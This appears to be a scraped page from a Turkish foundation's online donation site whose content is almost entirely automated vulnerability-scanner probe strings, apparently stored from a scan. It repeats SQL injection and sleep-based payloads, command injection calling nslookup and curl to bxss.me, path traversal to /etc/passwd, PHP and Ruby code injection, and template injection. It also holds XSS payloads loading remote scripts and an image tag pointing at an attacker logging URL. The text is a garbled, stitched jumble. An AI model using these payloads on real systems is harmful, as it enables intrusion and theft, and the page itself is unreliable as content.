Çağrı Vakfı Online Bağış - Hoşgeldiniz
Alışveriş sepetinizde ürün yok.
Lorem ipsum faucibus lacinia integer duis integer sodales accumsan, platea cubilia luctus sodales primis fusce ultricies, luctus feugiat tristique class urna consequat nostra duis erat malesuada semper tempor enim laoreet.
1Cpgotxt7QO
response.write(9645921*9653361)
'+response.write(9645921*9653361)+'
"+response.write(9645921*9653361)+"
echo weytan$()\ mlqjrx\nz^xyu||a #' &echo weytan$()\ mlqjrx\nz^xyu||a #|" &echo weytan$()\ mlqjrx\nz^xyu||a #
&echo hppiuf$()\ sdaegd\nz^xyu||a #' &echo hppiuf$()\ sdaegd\nz^xyu||a #|" &echo hppiuf$()\ sdaegd\nz^xyu||a #
|echo ebwklz$()\ letldj\nz^xyu||a #' |echo ebwklz$()\ letldj\nz^xyu||a #|" |echo ebwklz$()\ letldj\nz^xyu||a #
-1 OR 2+807-807-1=0+0+0+1 --
(nslookup -q=cname hitiahtrukcca81f42.bxss.me||curl hitiahtrukcca81f42.bxss.me))
$(nslookup -q=cname hitnmpzbnuhzpfa296.bxss.me||curl hitnmpzbnuhzpfa296.bxss.me)
-1 OR 3+807-807-1=0+0+0+1 --
&nslookup -q=cname hitrftotbgpvt990e9.bxss.me&'\"`0&nslookup -q=cname hitrftotbgpvt990e9.bxss.me&`'
-1 OR 2+463-463-1=0+0+0+1
&(nslookup -q=cname hithhtmvrwiyme0685.bxss.me||curl hithhtmvrwiyme0685.bxss.me)&'\"`0&(nslookup -q=cname hithhtmvrwiyme0685.bxss.me||curl hithhtmvrwiyme0685.bxss.me)&`'
-1 OR 3+463-463-1=0+0+0+1
|(nslookup -q=cname hitbbrunsdtzne54cb.bxss.me||curl hitbbrunsdtzne54cb.bxss.me)
-1' OR 2+163-163-1=0+0+0+1 --
`(nslookup -q=cname hitqcpseldpppa83c8.bxss.me||curl hitqcpseldpppa83c8.bxss.me)`
-1' OR 3+163-163-1=0+0+0+1 --
XYg8jjeY
-1' OR 2+228-228-1=0+0+0+1 or 'eU4ZvaN8'='
;(nslookup -q=cname hitkwnsiewrnb9a297.bxss.me||curl hitkwnsiewrnb9a297.bxss.me)|(nslookup -q=cname hitkwnsiewrnb9a297.bxss.me||curl hitkwnsiewrnb9a297.bxss.me)&(nslookup -q=cname hitkwnsiewrnb9a297.bxss.me||curl hitkwnsiewrnb9a297.bxss.me)
-1' OR 3+228-228-1=0+0+0+1 or 'eU4ZvaN8'='
-1" OR 2+224-224-1=0+0+0+1 --
-1" OR 3+224-224-1=0+0+0+1 --
../../../../../../../../../../../../../../etc/passwd
if(now()=sysdate(),sleep(15),0)
../../../../../../../../../../../../../../windows/win.ini
bcc:074625.247-42817.247.0d320.19745.2@bxss.me
file:///etc/passwd
to@example.com>
bcc:074625.247-42818.247.0d320.19745.2@bxss.me
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
../
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
./
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
<esi:include src="http://bxss.me/rpb.png"/>
-1; waitfor delay '0:0:15' --
-1); waitfor delay '0:0:15' --
1 waitfor delay '0:0:15' --
Y6xBYuTZ'; waitfor delay '0:0:15' --
-5 OR 591=(SELECT 591 FROM PG_SLEEP(15))--
-5) OR 272=(SELECT 272 FROM PG_SLEEP(15))--
${9999523+9999118}
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
Http://bxss.me/t/fit.txt
-1)) OR 268=(SELECT 268 FROM PG_SLEEP(15))--
http://bxss.me/t/fit.txt?.jpg
sFa8ICju' OR 211=(SELECT 211 FROM PG_SLEEP(15))--
/etc/shells
c:/windows/win.ini
&n968815=v938843
)
bxss.me
!(()&&!|*|*|
1PW9vH83') OR 186=(SELECT 186 FROM PG_SLEEP(15))--
^(#$!@#$)(()))******
S3mKvHQr')) OR 31=(SELECT 31 FROM PG_SLEEP(15))--
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
'"()
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
'&&sleep(27*1000)*bumykc&&'
1'"
"&&sleep(27*1000)*ejxnvo&&"
'||sleep(27*1000)*xjghlf||'
"||sleep(27*1000)*mwooxg||"
@@4yYOA
'.gethostbyname(lc('hitkb'.'pqqvsdvcc709b.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(104).chr(79).chr(118).chr(79).'
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
".gethostbyname(lc("hitcc"."rtdzurpbf56bc.bxss.me."))."A".chr(67).chr(hex("58")).chr(104).chr(78).chr(120).chr(77)."
';print(md5(31337));$a='
";print(md5(31337));$a="
${@print(md5(31337))}
${@print(md5(31337))}\
'.print(md5(31337)).'
ctime
sleep
p0
(I30
tp1
Rp2
.
HttP://bxss.me/t/xss.html?%00
bxss.me/t/xss.html?%00
"+"A".concat(70-3).concat(22*4).concat(115).concat(86).concat(102).concat(82)+(require"socket"
Socket.gethostbyname("hitgt"+"yfgtadyl27068.bxss.me.")[3].to_s)+"
'+'A'.concat(70-3).concat(22*4).concat(102).concat(75).concat(105).concat(86)+(require'socket'
Socket.gethostbyname('hitgr'+'vmfkyxgb20bc4.bxss.me.')[3].to_s)+'
visit-our-new-store
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
visit-our-new-store/.
xfs.bxss.me
'"
<!--
'"()&%<zzz><ScRiPt >Tf2R(9904)</ScRiPt>
'"()&%<zzz><ScRiPt >Tf2R(9360)</ScRiPt>
9286371
bfg4126<s1﹥s2ʺs3ʹhjl4126
bfgx1680%C0%BEz1%C0%BCz2a%90bcxhjl1680
<%={{={@{#{${dfb}}%>
<th:t="${dfb}#foreach
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
dfb{{98991*97996}}xca
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
<ScRiPt >Tf2R(9885)</ScRiPt>
<WKPEY9>UJE4W[!+!]</WKPEY9>
<script>Tf2R(9989)</script>
<ScR<ScRiPt>IpT>Tf2R(9930)</sCr<ScRiPt>IpT>
<ScRiPt
>Tf2R(9247)</ScRiPt>
<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9060></ScRiPt>
<isindex type=image src=1 onerror=Tf2R(9957)>
<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9119'>
<body onload=Tf2R(9348)>
<img src=//xss.bxss.me/t/dot.gif onload=Tf2R(9035)>
<img src=xyz OnErRor=Tf2R(9502)>
<img/src=">" onerror=alert(9782)>
%0D%0A%3C%53%63%52%69%50%74%20%3E%54%66%32%52%289983%29%3C%2F%73%43%72%69%70%54%3E
\u003CScRiPt\Tf2R(9625)\u003C/sCripT\u003E
<ScRiPt>Tf2R(9984)</sCripT>
%F6<img zzz onmouseover=Tf2R(91921) //%F6>
<input autofocus onfocus=Tf2R(9185)>
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>
}body{zzz:Expre/**/SSion(Tf2R(9047))}
GoGwe
<ScRiPt >Tf2R(9584)</ScRiPt>
<WMQPMW>OPH1Q[!+!]</WMQPMW>
<ifRAme sRc=9730.com></IfRamE>
<a20lLeD x=9931>
<img sRc='http://attacker-9067/log.php?
<a8cF6Kj<




'"()&%<zzz><ScRiPt >o99z(9622)</ScRiPt>


-1 OR 2+689-689-1=0+0+0+1 --
-1 OR 2+686-686-1=0+0+0+1
response.write(9016730*9598278)
'+response.write(9016730*9598278)+'
"+response.write(9016730*9598278)+"
6mE44Aq2






'"()&%<zzz><ScRiPt >o99z(9427)</ScRiPt>






9628413
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../windows/win.ini


file:///etc/passwd


../




-1' OR 2+118-118-1=0+0+0+1 --
echo sffyxr$()\ opjjvy\nz^xyu||a #' &echo sffyxr$()\ opjjvy\nz^xyu||a #|" &echo sffyxr$()\ opjjvy\nz^xyu||a #
-1' OR 2+261-261-1=0+0+0+1 or '07hGKjNC'='
to@example.com>
bcc:074625.247-45710.247.0d320.19745.2@bxss.me


&echo qdvxeb$()\ pqkryr\nz^xyu||a #' &echo qdvxeb$()\ pqkryr\nz^xyu||a #|" &echo qdvxeb$()\ pqkryr\nz^xyu||a #


-1" OR 2+689-689-1=0+0+0+1 --


|echo gidftp$()\ dwcuvy\nz^xyu||a #' |echo gidftp$()\ dwcuvy\nz^xyu||a #|" |echo gidftp$()\ dwcuvy\nz^xyu||a #




(nslookup -q=cname hitkgbycvckbne4c49.bxss.me||curl hitkgbycvckbne4c49.bxss.me))


$(nslookup -q=cname hitabupudcjjc0c05d.bxss.me||curl hitabupudcjjc0c05d.bxss.me)
&nslookup -q=cname hitryhiojwpzp40679.bxss.me&'\"`0&nslookup -q=cname hitryhiojwpzp40679.bxss.me&`'
if(now()=sysdate(),sleep(15),0)


&(nslookup -q=cname hitoewzufxmqb7b1f6.bxss.me||curl hitoewzufxmqb7b1f6.bxss.me)&'\"`0&(nslookup -q=cname hitoewzufxmqb7b1f6.bxss.me||curl hitoewzufxmqb7b1f6.bxss.me)&`'
|(nslookup -q=cname hitngjzsahuzga3499.bxss.me||curl hitngjzsahuzga3499.bxss.me)


`(nslookup -q=cname hitvngtixiyhse37b9.bxss.me||curl hitvngtixiyhse37b9.bxss.me)`
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
;(nslookup -q=cname hitjchrrkymmg9c4e5.bxss.me||curl hitjchrrkymmg9c4e5.bxss.me)|(nslookup -q=cname hitjchrrkymmg9c4e5.bxss.me||curl hitjchrrkymmg9c4e5.bxss.me)&(nslookup -q=cname hitjchrrkymmg9c4e5.bxss.me||curl hitjchrrkymmg9c4e5.bxss.me)
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z


(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
1 waitfor delay '0:0:15' --

<esi:include src="http://bxss.me/rpb.png"/>






HXdt4Meq'; waitfor delay '0:0:15' --






${10000313+9999494}




guCUldw8' OR 820=(SELECT 820 FROM PG_SLEEP(15))--




gyW0elfR') OR 502=(SELECT 502 FROM PG_SLEEP(15))--


http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
pVbXRarw')) OR 201=(SELECT 201 FROM PG_SLEEP(15))--
Http://bxss.me/t/fit.txt


http://bxss.me/t/fit.txt?.jpg

'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
/etc/shells
c:/windows/win.ini
1'"
bxss.me


@@6qxS6





&n979779=v964200




)




!(()&&!|*|*|




^(#$!@#$)(()))******




























'.gethostbyname(lc('hitta'.'gzaiqajy6fe18.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(122).chr(79).chr(108).chr(73).'
".gethostbyname(lc("hitar"."xdwzuonmecb47.bxss.me."))."A".chr(67).chr(hex("58")).chr(111).chr(81).chr(99).chr(70)."












'"()



'&&sleep(27*1000)*kgrqct&&'



"&&sleep(27*1000)*nznpvj&&"



'||sleep(27*1000)*ovvknz||'



"||sleep(27*1000)*raercn||"


;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
';print(md5(31337));$a='
";print(md5(31337));$a="




${@print(md5(31337))}
${@print(md5(31337))}\
'.print(md5(31337)).'


ctime
sleep
p0
(I30
tp1
Rp2
.


HttP://bxss.me/t/xss.html?%00




bxss.me/t/xss.html?%00
















"+"A".concat(70-3).concat(22*4).concat(110).concat(74).concat(112).concat(65)+(require"socket"
Socket.gethostbyname("hitxy"+"xnvzahmn79618.bxss.me.")[3].to_s)+"


'+'A'.concat(70-3).concat(22*4).concat(118).concat(68).concat(105).concat(73)+(require'socket'
Socket.gethostbyname('hitxn'+'hhintgmb47095.bxss.me.')[3].to_s)+'






visit-our-new-store
visit-our-new-store/.




)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
xfs.bxss.me










'"

'"()&%<zzz><ScRiPt >WJpv(9131)</ScRiPt>


<!--










'"()&%<zzz><ScRiPt >WJpv(9320)</ScRiPt>







9771005
bfg9818<s1﹥s2ʺs3ʹhjl9818
bfgx4928%C0%BEz1%C0%BCz2a%90bcxhjl4928
<%={{={@{#{${dfb}}%>
<th:t="${dfb}#foreach
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
dfb{{98991*97996}}xca
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

<ScRiPt >WJpv(9027)</ScRiPt>

<W546CX>UWN12[!+!]</W546CX>

<ScRiPt
>WJpv(9430)</ScRiPt>

<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9093></ScRiPt>

<isindex type=image src=1 onerror=WJpv(9354)>

<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9683'>

<body onload=WJpv(9010)>

<img src=//xss.bxss.me/t/dot.gif onload=WJpv(9688)>

<img src=xyz OnErRor=WJpv(9286)>

<img/src=">" onerror=alert(9781)>
%0D%0A%26%23%78%44%3B%26%23%78%41%3B%3C%53%63%52%69%50%74%20%3E%57%4A%70%76%289129%29%3C%2F%73%43%72%69%70%54%3E

<ScRiPt>WJpv(9935)</sCripT>
%F6<img zzz onmouseover=WJpv(95401) //%F6>

<input autofocus onfocus=WJpv(9289)>


<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>

}body{zzz:Expre/**/SSion(WJpv(9885))}

NHmPi
<ScRiPt >WJpv(9944)</ScRiPt>

<WPY57J>FVZUV[!+!]</WPY57J>

<ifRAme sRc=9569.com></IfRamE>

<awtPaYL x=9451>

<img sRc='http://attacker-9305/log.php?
'"()&%<zzz><ScRiPt >AWUC(9575)</ScRiPt>
response.write(9623749*9459352)
'+response.write(9623749*9459352)+'
-1 OR 2+811-811-1=0+0+0+1 --
"+response.write(9623749*9459352)+"
echo ligjpj$()\ iurayc\nz^xyu||a #' &echo ligjpj$()\ iurayc\nz^xyu||a #|" &echo ligjpj$()\ iurayc\nz^xyu||a #
-1 OR 3+811-811-1=0+0+0+1 --
&echo ohcosj$()\ uorypf\nz^xyu||a #' &echo ohcosj$()\ uorypf\nz^xyu||a #|" &echo ohcosj$()\ uorypf\nz^xyu||a #
-1 OR 2+254-254-1=0+0+0+1
-1 OR 3+254-254-1=0+0+0+1
|echo bluypy$()\ vhmwha\nz^xyu||a #' |echo bluypy$()\ vhmwha\nz^xyu||a #|" |echo bluypy$()\ vhmwha\nz^xyu||a #
(nslookup -q=cname hitlshlggzwso1feaa.bxss.me||curl hitlshlggzwso1feaa.bxss.me))
-1' OR 2+197-197-1=0+0+0+1 --
$(nslookup -q=cname hitoktcfouwgvf5462.bxss.me||curl hitoktcfouwgvf5462.bxss.me)
-1' OR 3+197-197-1=0+0+0+1 --
&nslookup -q=cname hitjjzetpxxpb5d9a5.bxss.me&'\"`0&nslookup -q=cname hitjjzetpxxpb5d9a5.bxss.me&`'
-1' OR 2+359-359-1=0+0+0+1 or 'y6BPrNJk'='
&(nslookup -q=cname hitcmbmgtunmjf6fd1.bxss.me||curl hitcmbmgtunmjf6fd1.bxss.me)&'\"`0&(nslookup -q=cname hitcmbmgtunmjf6fd1.bxss.me||curl hitcmbmgtunmjf6fd1.bxss.me)&`'
-1' OR 3+359-359-1=0+0+0+1 or 'y6BPrNJk'='

<aWDZr3x<
|(nslookup -q=cname hitifpaynrlgt1ef09.bxss.me||curl hitifpaynrlgt1ef09.bxss.me)
-1" OR 2+381-381-1=0+0+0+1 --
`(nslookup -q=cname hitxzfzvvqnmj8ac9a.bxss.me||curl hitxzfzvvqnmj8ac9a.bxss.me)`
-1" OR 3+381-381-1=0+0+0+1 --
;(nslookup -q=cname hittdfanbdczh32723.bxss.me||curl hittdfanbdczh32723.bxss.me)|(nslookup -q=cname hittdfanbdczh32723.bxss.me||curl hittdfanbdczh32723.bxss.me)&(nslookup -q=cname hittdfanbdczh32723.bxss.me||curl hittdfanbdczh32723.bxss.me)
if(now()=sysdate(),sleep(15),0)
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
'"()&%<zzz><ScRiPt >AWUC(9894)</ScRiPt>
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
-1; waitfor delay '0:0:15' --
-1); waitfor delay '0:0:15' --
1 waitfor delay '0:0:15' --
JXExdfQa
bOaZGDtG'; waitfor delay '0:0:15' --
-5 OR 815=(SELECT 815 FROM PG_SLEEP(15))--
-5) OR 130=(SELECT 130 FROM PG_SLEEP(15))--
-1)) OR 359=(SELECT 359 FROM PG_SLEEP(15))--
lSHwQxeP' OR 651=(SELECT 651 FROM PG_SLEEP(15))--
BSAUc3zC') OR 985=(SELECT 985 FROM PG_SLEEP(15))--


6WgJv0zg')) OR 256=(SELECT 256 FROM PG_SLEEP(15))--
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1'"


../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../windows/win.ini
file:///etc/passwd
@@gc87n


bcc:074625.247-46789.247.0d320.19745.2@bxss.me
../
to@example.com>
bcc:074625.247-46790.247.0d320.19745.2@bxss.me
./
<esi:include src="http://bxss.me/rpb.png"/>
9196145




${10000201+10000041}
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
Http://bxss.me/t/fit.txt
http://bxss.me/t/fit.txt?.jpg
&n931490=v980594
/etc/shells
c:/windows/win.ini
bxss.me




bfg3103<s1﹥s2ʺs3ʹhjl3103
)
!(()&&!|*|*|
^(#$!@#$)(()))******


bfgx3554%C0%BEz1%C0%BCz2a%90bcxhjl3554




<%={{={@{#{${dfb}}%>


'.gethostbyname(lc('hituj'.'ixcrxvbuf747f.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(100).chr(66).chr(102).chr(67).'
".gethostbyname(lc("hitnr"."eribphaoc575d.bxss.me."))."A".chr(67).chr(hex("58")).chr(119).chr(66).chr(101).chr(65)."


'"()
'&&sleep(27*1000)*ttnjbx&&'
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
<th:t="${dfb}#foreach
"&&sleep(27*1000)*lpgyxa&&"
';print(md5(31337));$a='
'||sleep(27*1000)*xkckbx||'
";print(md5(31337));$a="
"||sleep(27*1000)*iuduml||"
${@print(md5(31337))}
${@print(md5(31337))}\
'.print(md5(31337)).'


1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
ctime
sleep
p0
(I30
tp1
Rp2
.


HttP://bxss.me/t/xss.html?%00
bxss.me/t/xss.html?%00


"+"A".concat(70-3).concat(22*4).concat(115).concat(79).concat(97).concat(73)+(require"socket"
Socket.gethostbyname("hitrb"+"lssssjdueaded.bxss.me.")[3].to_s)+"
'+'A'.concat(70-3).concat(22*4).concat(107).concat(71).concat(98).concat(74)+(require'socket'
Socket.gethostbyname('hitks'+'exzdhwyidcb8f.bxss.me.')[3].to_s)+'
dfb{{98991*97996}}xca
visit-our-new-store
visit-our-new-store/.


)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
dfb[[${98991*97996}]]xca
xfs.bxss.me
'"
<!--
'"()&%<zzz><ScRiPt >BqH8(9282)</ScRiPt>
dfb__${98991*97996}__::.x
'"()&%<zzz><ScRiPt >BqH8(9835)</ScRiPt>


9267410


"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
bfg4883<s1﹥s2ʺs3ʹhjl4883
<ScRiPt >AWUC(9818)</ScRiPt>
bfgx4349%C0%BEz1%C0%BCz2a%90bcxhjl4349


<%={{={@{#{${dfb}}%>
<W013ZR>GGNFN[!+!]</W013ZR>


<script>AWUC(9379)</script>




<th:t="${dfb}#foreach
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
<ScR<ScRiPt>IpT>AWUC(9112)</sCr<ScRiPt>IpT>
dfb{{98991*97996}}xca


dfb[[${98991*97996}]]xca


<ScRiPt
>AWUC(9047)</ScRiPt>


dfb__${98991*97996}__::.x


"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9117></ScRiPt>


<ScRiPt >BqH8(9345)</ScRiPt>


<WMVJMD>7I375[!+!]</WMVJMD>


<script>BqH8(9457)</script>
<ScR<ScRiPt>IpT>BqH8(9995)</sCr<ScRiPt>IpT>


<isindex type=image src=1 onerror=AWUC(9257)>
<ScRiPt
>BqH8(9045)</ScRiPt>


<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9438></ScRiPt>
<isindex type=image src=1 onerror=BqH8(9836)>


<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9439'>
<body onload=AWUC(9698)>
<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9625'>


<img src=//xss.bxss.me/t/dot.gif onload=AWUC(9923)>




<body onload=BqH8(9495)>
<img src=xyz OnErRor=AWUC(9513)>
<img src=//xss.bxss.me/t/dot.gif onload=BqH8(9034)>


<img src=xyz OnErRor=BqH8(9824)>


<img/src=">" onerror=alert(9394)>
<img/src=">" onerror=alert(9015)>


%0D%0A%3C%53%63%52%69%50%74%20%3E%42%71%48%38%289151%29%3C%2F%73%43%72%69%70%54%3E
%0D%0A%3C%53%63%52%69%50%74%20%3E%41%57%55%43%289127%29%3C%2F%73%43%72%69%70%54%3E
\u003CScRiPt\BqH8(9711)\u003C/sCripT\u003E


<ScRiPt>BqH8(9771)</sCripT>


%F6<img zzz onmouseover=BqH8(96311) //%F6>
\u003CScRiPt\AWUC(9789)\u003C/sCripT\u003E
<input autofocus onfocus=BqH8(9239)>
<ScRiPt>AWUC(9369)</sCripT>
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>
%F6<img zzz onmouseover=AWUC(96721) //%F6>
}body{zzz:Expre/**/SSion(BqH8(9087))}
SKmGt
<ScRiPt >BqH8(9175)</ScRiPt>
<WBFTA4>YYAZW[!+!]</WBFTA4>
<input autofocus onfocus=AWUC(9074)>
<ifRAme sRc=9876.com></IfRamE>
<aftJlfo x=9738>
<img sRc='http://attacker-9945/log.php?